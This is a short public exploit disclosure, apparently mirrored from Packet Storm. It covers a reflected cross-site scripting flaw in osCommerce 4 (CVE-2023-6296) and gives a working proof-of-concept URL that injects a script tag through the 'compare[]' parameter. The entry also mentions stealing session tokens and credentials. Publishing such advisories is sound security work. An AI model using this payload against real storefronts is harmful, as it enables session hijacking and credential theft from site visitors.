Share
## https://sploitus.com/exploit?id=PACKETSTORM:175925
# Exploit Title: osCommerce 4 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 13/11/2023  
# Vendor: osCommerce ltd.  
# Vendor Homepage: https://www.oscommerce.com/  
# Software Link: https://demo.oscommerce.com/  
# Demo Link: https://demo.oscommerce.com/printshop/  
# Tested on: Windows 11 Home  
# Impact: Manipulate the content of the site  
# CWE: CWE-79 - CWE-74 - CWE-707  
# CVE: CVE-2023-6296  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
Attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
Path: /catalog/compare  
  
GET parameter 'compare[]' is vulnerable to XSS  
  
https://website/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx  
  
  
  
[-] Done